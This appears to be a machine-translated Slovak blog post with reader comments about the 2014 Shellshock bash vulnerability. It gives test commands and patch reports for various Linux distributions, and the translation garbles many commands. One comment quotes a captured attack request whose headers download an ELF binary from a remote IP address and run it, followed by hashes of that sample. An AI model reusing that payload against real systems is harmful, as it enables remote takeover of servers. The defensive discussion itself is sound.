Na niektorých blogoch to beží ako blesk, novinka zverejnená v bezpečnostný blog de Red Hat o zraniteľnosti zistenej v Bashi v dôsledku zneužitia globálnych premenných. Podľa pôvodných správ:
„... Zraniteľnosť je spôsobená skutočnosťou, že pred volaním prostredia bash môžete vytvoriť premenné prostredia so špeciálne vytvorenými hodnotami. Tieto premenné môžu obsahovať kód, ktorý sa vykoná hneď po vyvolaní shellu. Nezáleží na názve týchto prepracovaných premenných, iba na ich obsahu. Výsledkom je, že táto chyba je odhalená v mnohých kontextoch, napríklad:
- ForceCommand používa sa v konfiguráciách sshd na zabezpečenie obmedzených možností vykonávania príkazov pre vzdialených používateľov. Túto chybu je možné použiť, aby ste sa tomu vyhli a poskytli svojvoľné vykonávanie príkazov. Niektoré implementácie Git a Subversion používajú také obmedzené mušle. Pravidelné používanie OpenSSH to neovplyvní, pretože používatelia už majú prístup ku konzole.
- Server Apache využívajúci mod_cgi alebo mod_cgid bude ovplyvnený, ak sú skripty CGI zapísané v bash alebo v podúrovniach. Takéto podúrovne implicitne používa systém / popen v jazyku C, os.system / os.popen v jazyku Python, ak používa shell / exec v PHP (keď je spustený v režime CGI) a open / system v Perli (čo závisí od príkazového reťazca).
- Skripty PHP vykonávané s mod_php nie sú ovplyvnené, aj keď sa prehrávajú podúrovne.
- Klienti DHCP na konfiguráciu systému vyvolávajú shell skripty s hodnotami získanými z potenciálne škodlivého servera. To by umožnilo vykonávať ľubovoľné príkazy, zvyčajne ako root, na klientskom počítači DHCP.
- Rôzne démoni a programy s oprávneniami SUID môžu vykonávať skripty shellu s hodnotami premenných prostredia nastavenými / ovplyvnenými používateľom, čo by umožňovalo vykonávanie ľubovoľných príkazov.
- Akákoľvek iná aplikácia, ktorá sa pripája k shellu alebo spúšťa shell skript, ako napríklad použitie bash ako tlmočníka. Shell skripty, ktoré neexportujú premenné, nie sú voči tomuto problému zraniteľné, ani keď spracujú nedôveryhodný obsah a uložia ho do otvorené premenné shellu (vľavo) a podúrovne.
… »
Ako zistiť, či je ovplyvnený môj Bash?
Vzhľadom na to existuje veľmi jednoduchý spôsob, ako zistiť, či sa nás táto zraniteľnosť týka. V skutočnosti som testoval na svojom Antergose a zjavne nemám problém. Musíme otvoriť terminál a vložiť:
env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test"
Ak to vyjde takto, nemáme problém:
env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test" bash: varovanie: x: ignorovanie definície funkcie pokus bash: chyba pri importovaní definície funkcie pre `x' toto je test
Ak je výsledok iný, mali by ste použiť aktualizačné kanály našich preferovaných distribúcií a zistiť, či už opravu použili. Takže vieš 😉
Aktualizované: Toto je výstup od spolupracovníka používajúceho Ubuntu 14:04:
env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test" zraniteľný toto je test
Ako vidíte, zatiaľ je zraniteľný.
Mám Kubuntu 14.04 zo 64 a tiež dostávam:
env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test"
zraniteľný
toto je test
Už som aktualizoval, ale neopravuje to. Čo robiť?
Počkajte, kým sa aktualizujú. Už je napríklad aktualizovaný eOS .. 😀
Aké čudné, mám aj Kubuntu 14.04
$ env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test"
bash: varovanie: x: ignorovanie pokusu o definíciu funkcie
bash: chyba pri importovaní definície funkcie pre `x '
toto je test
Dodávam, že verzia balíka „bash“, ktorá bola dnes stiahnutá, je:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
V mojom prípade zadaním príkazu mi v termináli dáte iba toto:
>
Vtip je v tom, že som aktualizoval Debian Wheezy a to ma vyhodilo.
Wheezy je stále zraniteľný voči druhej časti ploštice, minimálne na popoludnie (UTC -4: 30) problém stále nasledoval: /
Len som overil, že po použití aktualizácie dnes ráno nie sú ovplyvnené ani Slackware, ani Debian, ani Centos, pretože dostali zodpovedajúcu aktualizáciu.
Čo robí Ubuntu v tejto hodine stále zraniteľným? A povedz mi, že je to bezpečné: D.
Ale pokúsili ste sa aktualizovať Ubuntu?
S dnešnou aktualizáciou to tiež napravili.
OK
Bezpečnostní experti varujú pred zraniteľnosťou „Bash“, pre používateľov softvéru Linux by mohla predstavovať väčšiu hrozbu ako chyba Heartbleed, kde môžu hackeri chybu v Bashi zneužiť na získanie úplnej kontroly nad systémom.
Tod Beardsley, technický manažér vo firme Rapid7 zameranej na kybernetickú bezpečnosť, varoval, že chyba bola hodnotená stupňom závažnosti 10, čo znamená, že má maximálny dopad, a hodnotením „nízka“ komplexnosť zneužitia, čo je pre „hackera“ relatívne ľahké. útoky. Použitím tejto chyby zabezpečenia môžu útočníci potenciálne prevziať kontrolu nad operačným systémom, získať prístup k dôverným informáciám, vykonávať zmeny atď., “Uviedol Beardsley. „Každý, kto má systémy, ktoré obsadzujú Bash, by mal náplasť okamžite aplikovať,“ dodal.
PRED TOUTO ZRANITEĽNOSŤOU, KTORÁ PREDSTAVUJE STARÝ NÁSTROJ (GNU), kde je hostený Bach, by bolo pre Linux Software pohodlnejšie zbaviť sa GNU a zmeniť nástroj BSD.
PS: NESCENZUJTE moju slobodu prejavu, ... nikoho neurážajte, ... neodstraňujte moju správu ako predchádzajúcu správu, ktorú som vymazal!.
Prosím, nepreháňajte to. Ako nenávidím tých ľudí, ktorí používajú BSD a pohŕdajú GNU, Linuxom alebo čímkoľvek, čo pochádza z týchto projektov.
Som s vami a máte úplnú pravdu, pokiaľ ide o závažnosť tejto diery.
Nebola to cenzúra, bola to nadbytočnosť (rovnaký komentár ste uviedli aj v príspevku gnome 3.14)
«… A hodnotené ako„ NÍZKE “PRETOŽE KOMPLEXNOSTI vykorisťovania, čo znamená, že je pomerne ľahké pre hackerské útoky»
Je nápadná nezrovnalosť?
Ako môže byť ľahké využiť zraniteľnosť a zároveň mať „nízku“ úroveň rizika, pretože je tak zložité na použitie?
Je to chyba, ktorá sa vyriešila v priebehu niekoľkých hodín po tom, čo sa spoznali, a ktorá rovnako ako srdcervúca, nemá žiadne správy o tom, že by bola zneužitá (samozrejme, má to menej času na to, aby ste sa navzájom poznali).
Je to viac bulvárna tlač ako skutočné riziko.
Zdá sa vám @Staff nedôležitý? Čo mi teraz povieš?
ZÍSKAŤ./.HTTP/1.0
.Užívateľ-agent: .Ďakujem-Rob
.Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Referer: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Súhlasiť:. * / *
$ súbor nginx
nginx: 32-bitový spustiteľný súbor LSB ELF, Intel 80386, verzia 1 (SYSV), staticky prepojený, pre GNU / Linux 2.6.18, odizolovaný
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256súčet nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Vieš čo to je? Malého nebezpečného ničoho ...
Situácia je dosť vážna, ale odtiaľ hovorím, že by ste mali prestať používať bash pre voľbu BSD, už je to toľko, každopádne aktualizácia už existuje, iba sa dotknem aktualizácie a nič iného.
Teraz si myslím, že je to skôr kolega @robet, nemyslím si, že správcovia sa tu venujú mazaniu takýchto komentárov, pretože áno, pretože, pretože som sa podieľal na tejto komunite, mal som ten pocit a dúfam, že zostane tak.
Zdravím.
Rovnaký komentár ste vložili do dvoch rôznych príspevkov. Ak sa snažíte propagovať „zdroj“ správ, je mi ľúto, ale toto nie je miesto.
Bash pochádza z Unixu (a jeho klonu GNU). Ovplyvnené sú aj systémy založené na BSD, ako napríklad OSX, a podľa Genbety to zatiaľ neopravili. Rovnako tak pre prístup k Bash potrebujete užívateľský účet, buď lokálny, alebo cez SSH.
@ Zamestnanci:
1. - Je klasifikovaný ako 10. úroveň (maximálna úroveň nebezpečenstva) kvôli množstvu služieb, ktoré môžu byť ovplyvnené chybou. V hlavnej poznámke túto skutočnosť objasňujú veľmi jasne a tvrdia, že chyba môže mať vplyv na služby ako apache, sshd, programy s oprávneniami suid (okrem iných aj xorg).
2.- Z hľadiska jeho implementácie je klasifikovaný ako nízky stupeň náročnosti. Najlepším príkladom je skript na test zraniteľnosti, ktorý @elav vložil do príspevku. Ako vidíte, implementácia nie je veľmi ťažká.
V informáciách nevidím nadbytočnosť (vidím iba preklad Google) a ak je problém dosť vážny a ako hovoríte, už má opravu a riešenie, ale nie za to, už to nie je riziko, a celkom skutočný.
@petercheco / @Yukiteru
Nechápte ma zle, myslím si, že je zrejmé, že mojou kritikou sú správy, ktoré Robet spája a sú zamerané na nesúlad a nie nadbytočnosť.
Rovnakým spôsobom musíme rozlišovať medzi rizikom a nebezpečenstvom (posledné neuvádzam), bežne ich používame ako synonymá, nebezpečenstvom tu by však bola schopnosť poškodenia ploštice a riziko pravdepodobnosti jeho výskytu.
V mojom konkrétnom prípade som vstúpil zo včera. Nebolo to pre zoznamy adresátov ani nič podobné. Bolo to pre distribúciu na pracovnej ploche! Zdvihla som telefón a poslala správu sysadminovi s odkazom a potvrdila som, že mám všetko opravené, potom ma ospravedlňte, ale tieto správy mi nedajú spať.
Na iných fórach sa zmienili o zraniteľnosti Bash, „riešení, ktoré vydali Debian a Ubuntu“, ale dnes zistili, že zraniteľnosť stále existuje, takže riešenie bolo neúplné, to je to, čo spomínajú!
Vidím, že ma mnohí kritizovali za jednoduchú skutočnosť, že ľuďom bránim v závažnosti zraniteľnosti - kvalifikovanej s úrovňou maximálnej nebezpečnosti 10, a spomenuli možné riešenia pre Linux Software tvárou v tvár zastaranému GNU nástroju, kde je hostený Bash - ktorý dokonale GNU by sa dal nahradiť nástrojom BSD v Linux Software, ... Používam tiež Linux a mám rád Linux!
Objasňujem, že Bash nie je štandardne nainštalovaný v BSD, je to ešte jeden balík kompatibility s Linuxom, ktorý je možné nainštalovať do BSD ... áno! A zdroj je nastavený tak, aby mohli skontrolovať správy, pretože mnoho používateľov niekedy správe alebo komentárom neverí.
robet: Ako ti už hovorili znova a znova, svoj komentár so správami si už vložil do príspevku, nemusíš ho vkladať do každého príspevku, ktorý komentuješ.
O bashe existujú ďalšie škrupiny, ktoré sa dajú použiť v prípade, že je Bash zraniteľný. 😉
Robet, o ktorom viem, že neexistuje softvér, ktorý by kombinoval linuxové jadro s BSD userland. Najbližšia vec je naopak, kBSD + GNU, ako to robia Gentoo a Debian. Okrem toho GNU (1983) nemožno nazvať „staromódnym“, ak je to po BSD (1977). Obaja zdieľajú svoj root Unix (nie však kód), neexistovala by žiadna „kompatibilita s Linuxom“, keby bol Bash vytvorený, keď bol Linus T ešte dieťa.
uff, testovanie na Debiane je v tejto chvíli „zraniteľné“, aké máme série ...
Používam Debian Testing a dokonca aj v tejto vetve sme dostali bash aktualizáciu
podľa genbety existuje aj ďalšia zraniteľnosť
http://seclists.org/oss-sec/2014/q3/685
príkaz konzultovať je
env X = '() {(a) => \' sh -c "echo zraniteľný"; bash -c "chyba ozveny 2 bez opravy"
to isté ja.
Rovnako aj tu. Ale pôvodná chyba v príspevku bola opravená v (L) Ubuntu 14.04
Namiesto vykonania jednoduchej ozveny sa pokúsi prinútiť vykonať inštrukciu, ktorá si vyžaduje privilégiá, hodím „nedostatočné privilégiá“ ... táto chyba eskaluje privilégiá? Ak eskaluje privilégiá, potom to nie je také nebezpečné, ako ich vykresľujú.
Máš pravdu!! boli to dve zraniteľnosti ...
Pre mňa v Linux Mint 17 po druhej aktualizácii bash, ktorú minulú noc vložili do repozitárov Ubuntu, pri vykonávaní tohto príkazu shell ponúka tento výstup:
env X = '() {(a) => \' sh -c "echo zraniteľný"; bash -c "echo Fail 2 nespracované"
>
Verzia „bassh“, ktorá bola vložená do repozitárov Ubuntu na aktualizáciu predchádzajúcich, je:
4.3-7ubuntu1.2
V systémoch odvodených od Debianu môžete skontrolovať nainštalovanú verziu pomocou tohto príkazu:
dpkg -s bash | grep verzia
V každom prípade by malo byť objasnené, prinajmenšom pre používateľov Debianu, Ubuntu a Mint; Nemali by ste sa príliš zaoberať programami, ktoré spúšťajú skripty s hlavičkou #! / Bin / sh, pretože na týchto distribúciách / bin / sh nevolá „bash“, ale viaže sa na shell „dash“ (dash je :)
Konzola Debian Alchemist (dash) je odvodená konzola POSIX
popola.
.
Pretože spúšťa skripty rýchlejšie ako bash a má menej závislostí
knižníc (čím je odolnejšia proti zlyhaniam softvéru alebo
hardvér), používa sa ako predvolená systémová konzola v systémoch
Debian.
Prinajmenšom v Ubuntu sa teda „bash“ používa ako shell pre prihlásenie užívateľa (aj pre root). Ale každý užívateľ môže predvolene používať iný shell pre užívateľa a root konzoly (terminály).
Je ľahké skontrolovať, či shell vykonáva skripty (#! / Bin / sh) vykonaním týchto príkazov:
pilník / bin / sh
(výstup je / bin / sh: symbolický odkaz na `dash '), sledujeme stopu opakujúcu príkaz
súbor / kôš / pomlčka
(výstup je / bin / dash: ELF 64-bit LSB shared object, x86-64, verzia 1 (SYSV), takže toto je spustiteľný súbor.
Toto sú výsledky v distribúcii Linux Mint 17. V iných distribúciách, ktoré nie sú založené na Ubuntu / Debian, sa môžu líšiť.
Nie je ťažké zmeniť predvolený shell !! môžete dokonca použiť iný pre používateľov a pre používateľov root. V skutočnosti stačí nainštalovať shell podľa vášho výberu a zmeniť predvolené nastavenie pomocou príkazu „chsh“ alebo úpravou súboru / etc / passwd (aj keď používatelia, ktorí nepoznajú následky chyby pri úprave súboru „passwd“, Je lepšie, aby sa veľmi dobre informovali a pred úpravami si vytvorili kópiu originálu pre prípad, že je potrebné ich obnoviť).
Cítim sa pohodlnejšie s „tcsh“ (tcsh je :)
Konzola TENEX C, vylepšená verzia Berkeley csh
„Csh“ je to, čo Mac OS X používal pred niekoľkými rokmi. Čo dáva zmysel, ak uvážime, že väčšina operačného systému spoločnosti Apple je kód FreeBSD. Teraz z toho, čo som čítal včera, sa zdá, že poskytujú aj „bash“ pre používateľské terminály.
ZÁVERY:
- Opravy „základných“ verzií „najpoužívanejších distribúcií“ už boli distribuované
- Verzia „bash“ 4.3-7ubuntu1.2 a novšia neobsahuje tieto chyby
- Používanie "bash" v OS * Linux nie je povinné
- Niekoľko * linuxových distribúcií odkaz #! / Bin / sh s „bash“
- Existujú alternatívy: ash, dash, csh, tcsh a niektoré ďalšie
- Nie je komplikované meniť predvolený shell, ktorý systém volá pri otvorení terminálu
- Niekoľko malých zariadení (smerovače a iné) používa „bash“, pretože je veľmi veľký !!
Práve teraz dorazila ďalšia aktualizácia, ktorá inštaluje ďalšiu verziu „bash“ 4.3-7ubuntu1.3
Pre systémy Linux Mint 17 a Ubuntu 14.04.1 LTS
ArchLinux vstúpil do verzie bash-4.3.026-1
@ Xurxo .... Tento nástroj je najlepší pre softvér Linux.
Myslím, že toto je chyba
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
pravda?
A aké by bolo riešenie?
Počkajte, kým aktualizujú balík na vašej distribúcii 😉
Ploštica bola pokrstená ako mušľový šok
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
zraniteľný
toto je test
Pre Ubuntu Studio 14.04 zatiaľ žiadna opravná aktualizácia
Opravené v Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test"
bash: varovanie: x: ignorovanie pokusu o definíciu funkcie
bash: chyba pri importovaní definície funkcie pre `x '
toto je test
Je to v skutočnosti menšia zraniteľnosť, ak sa vás to týka, je to, že ste predtým niečo robili zle ...
Pretože bash skript, ktorý beží s oprávneniami root, by nikdy nemal byť vystavený používateľovi. A ak kandiduje bez privilégií, takáto zraniteľnosť neexistuje. Vlastne je to hlúpe. Veľa strašidelného.
Myslím si to isté.
Presne povedané, tieto chyby sú dobré, ak chcete predať viac novín alebo získať viac návštev.
Vždy však zabudnú spomenúť, že ak chcete kompromitovať počítač pomocou týchto druhov skriptov, musíte mať najskôr prístup k bash a potom ho mať ako root.
zamestnanci, ak používate apache s cgi, stačí vložiť hlavičky http ako cookies alebo odporučiť funkciu, ktorú chcete vykonať. Dokonca sa používal na šírenie červov.
a ak niekto vloží shell na server s wget mishell.php, v takom prípade to nie je vážne, že?
Súhlasím s Vami. Myslel som si, že je to obrovská chyba ako v Heartbleed (dokonca aj NSA si požičala na podporu chorobnosti), ale koniec koncov to bola malá chyba.
Existujú ďalšie skutočne vážne chyby, ako napríklad šialená spotreba programu Flash a spomalenie výkonu v prehrávači Pepper Flash Player, a ten, ktorý už bol opravený chyba webRTC v prehliadačoch Chrome a Firefox.
Viete, či má dohodu pre ľudí, ktorí majú Linux Mint 16?
V testovaní Debianu to už bolo opravené.
V mojich 5 distribúciách je to vyriešené, v mojom OS X to neviem.
Prosím, necenzurujte môj komentár, povedal som OS X. Neviem, či môžete na tomto webe povedať OS X.
@yoyo dobre sa moc netrápte, že stále pracujú na niektorých detailoch opravy ... skúste to a potom mi povedzte, čo napríklad XD
env x = '() {:;}; echo zraniteľný 'bash -c "echo Som zraniteľnejší ako kôš iPhonu 6"
Že ak to majú vyriešené na 100% pred OS X, stavím čokoľvek
No, aj v Ars Technica dávajú relevanciu Bash v OSX.
@Yoyo ďalší komentár k OS X pre SPAM .. lla tu save .. 😛
@yoyo tam opraviť ponuky ... ale zvyšok viete 😉
Vystúpila FSF
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Rovnako ako sa stali sponzormi OSX (pretože OSX stále používa Bash: v).
S Debianom Jessie sa tak veľmi nemusím trápiť.
Ak je systém zraniteľný v systéme Cent OS:
yum všetko vyčistiť && yum update bash
zobraziť verziu bash:
otáčky -qa | grep bash
Ak je verzia staršia ako bash-4.1.2-15.el6_5.1, môže byť váš systém zraniteľný!
Zdravím.
2. zraniteľnosť ešte nie je vyriešená
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "chyba ozveny 2 bez opravy"
Aktualizuje sa ...
V Gentoo sa mi stane pravý opak, som zraniteľný iba pri prvom neúspechu, ale pri druhom dostanem toto:
[code] sh: X: riadok 1: syntaktická chyba v blízkosti neočakávaného prvku `= '
sh: X: riadok 1: “
sh: chyba pri importovaní definície funkcie pre `X '
sh: zraniteľné: príkaz sa nenašiel
Chyba 2 nie je opravená
[/ kód]
Neviem, či už bude existovať stabilná verzia Bash s opravenými chybami, ale tak či tak to bude čakať nabudúce, urobím emerge –sync && emerge –update –deep –with-bdeps = a - newuse @world (takto aktualizujem celý systém).
Mám Gentoo s verziou 4.2_p50 a zatiaľ prešlo všetkými testami. Skúste vytvoriť novinku –sync a potom objavte -av1 app-shells / bash a potom pomocou príkazu bash –version skontrolujte verziu 4.2_p50.
Skúsili ste to?
A s novými balíčkami nový test poskytnutý spoločnosťou Red Hat
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "dátum ozveny"; mačka / tmp / echo
ak náš systém nie je zraniteľný a bol správne opravený, musí nám dať niečo také
Dátum 1
2 cat: / tmp / echo: Súbor alebo adresár neexistuje
Skúste to takto:
env X = '() {(a) => \' sh -c "echo zraniteľný"; bash -c "oprava zlyhania echa 2"
dostávam
zraniteľný
Chyba 2 opravená.
Zabudnite, riadok je zle naformátovaný.
Výborne! Aktualizáciu som už vykonal na svojom Slackware, ďakujem!
Ahoj, mám otázku, mám niekoľko serverov s 10 bitmi „SUSE Linux Enterprise Server 64“.
Keď vykonám príkazy, ktoré sú zraniteľné, som ešte zraniteľnejší ako kôš iPhone 6 xD
Pokiaľ sa nemýlim s aktualizáciou / inštaláciou balíkov v SUSE, robí sa to príkazom «zypper».
Na niektorých serveroch mi to hovorí toto:
BIAL: ~ # zypper hore
-bash: zypper: príkaz sa nenašiel
BIAL: ~ #
A v ďalších toto:
SMB: ~ # zypper hore
Obnovujú sa zdroje systému ...
Analýza metadát pre SUSE Linux Enterprise Server 10 SP2-20100319-161944…
Analyzuje sa databáza RPM ...
Zhrnutie:
Nič na práci.
Čo robím?
Viem, že niektorí tvrdia, že zraniteľnosť je menšia ako to, čo maľujú, ale ja ju mám a nechcem byť vystavený riziku, či už je to malé alebo veľké.
Zdravím.
Dobrú noc, skúsil som prilepiť kód, ktorý ste uviedli v článku, toto chápem
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo zraniteľný 'bash -c "echo toto je test"
toto je test
sanders @ pc-sanders: ~ $
Mohli by ste mi, prosím, vysvetliť, ako opraviť distro, aktualizujem každý deň a nevidím zmeny vo výstupe výzvy.
Ďakujem moc!